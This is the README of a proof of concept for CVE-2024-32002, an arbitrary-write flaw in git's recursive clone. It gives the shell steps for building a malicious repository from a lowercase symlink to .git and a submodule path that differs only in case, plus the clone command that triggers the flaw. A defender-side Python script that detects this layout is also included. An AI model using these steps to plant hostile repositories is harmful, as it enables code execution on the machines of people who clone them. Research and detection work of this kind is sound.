A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.
See cve-2024-32002-submodule-aw for the related submodule repository.
- A symlink with an arbitrary name that links to the `.git` directory.
- A `.gitmodules` file that defines the malicious submodule.
This repo was created in Linux (WSL2, to be specific). This is important: the malicious repo can only be created on a case-sensitive filesystem.
- Create a symlink, using all lowercase characters:

  ```sh
  ln -s .git submodule
  ```
Notes:
- The symlink should point to the .git folder, since this is where we want to write files
- The symlink name (submodule) is arbitrary, but should start with a lowercase character
- This is important, because lowercase characters sort earlier than uppercase characters. When the cloning machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.
- Add the malicious submodule, noting the case difference on the submodule directory name:

  ```sh
  git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
  ```
Notes:
- The name of the submodule matters, it will come into play when placing our hook in the submodule.
- The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
- There must be at least one other segment to the path, since git will only clone submodules into an empty directory. It will create directories for us though, so we chose "notexists" to demonstrate that.
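A defender-side check for the layout described above, added here and not part of this PoC repository: it parses `.gitmodules`, lists top-level symlinks that resolve into `.git`, and flags any declared submodule whose first path segment matches such a symlink case-insensitively. Run it against a checkout made without `--recursive`; the sample directory it builds in a temp dir is a constructed stand-in for such a checkout, and `build_sample_repo`, `find_git_symlink_collisions` and `submodule_paths` are names chosen for this example.

```python
import os
import tempfile

# URL from the README above; everything else this script builds is a constructed sample.
SUBMODULE_URL = "https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git"

def submodule_paths(gitmodules_text):
    """Return every 'path = ...' value declared in a .gitmodules file."""
    paths = []
    for line in gitmodules_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() == "path":
            paths.append(value.strip())
    return paths

def find_git_symlink_collisions(root):
    """Return (symlink, submodule_path) pairs where a top-level symlink that resolves
    into .git matches a submodule's first path segment ignoring case (the case-only
    difference is exactly what a vulnerable client trips over)."""
    gitmodules = os.path.join(root, ".gitmodules")
    if not os.path.isfile(gitmodules):
        return []
    git_dir = os.path.join(root, ".git")
    links = {}  # lowercased symlink name -> actual name on disk
    for name in os.listdir(root):
        full = os.path.join(root, name)
        if os.path.islink(full):
            target = os.path.normpath(os.path.join(root, os.readlink(full)))
            if target == git_dir or target.startswith(git_dir + os.sep):
                links[name.lower()] = name
    with open(gitmodules) as fh:
        paths = submodule_paths(fh.read())
    hits = []
    for path in paths:
        first = path.replace("\\", "/").split("/")[0]
        if first.lower() in links:
            hits.append((links[first.lower()], path))
    return hits

def build_sample_repo(malicious=True):
    """Construct a throwaway checkout mimicking the README's layout (not a real clone)."""
    root = tempfile.mkdtemp(prefix="cve-2024-32002-check-")
    os.mkdir(os.path.join(root, ".git"))
    with open(os.path.join(root, ".gitmodules"), "w") as fh:
        fh.write(f'[submodule "aw"]\n\tpath = Submodule/notexists\n\turl = {SUBMODULE_URL}\n')
    if malicious:  # the lowercase symlink into .git is the malicious ingredient
        os.symlink(".git", os.path.join(root, "submodule"))
    return root

if __name__ == "__main__":
    print(find_git_symlink_collisions(build_sample_repo()))
```

Point `find_git_symlink_collisions` at a real non-recursive checkout to review it before running anything with `--recursive`; an empty list means no top-level symlink into `.git` collides with a declared submodule path.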
- Check whether you have a vulnerable version of git. See the GitHub advisory for affected versions.

  ```sh
  git --version
  ```
- Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
- Run the following command:

  ```sh
  git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
  ```
- Take a look in the `.git` directory. See anything out of place? Hint: what files are in the submodule?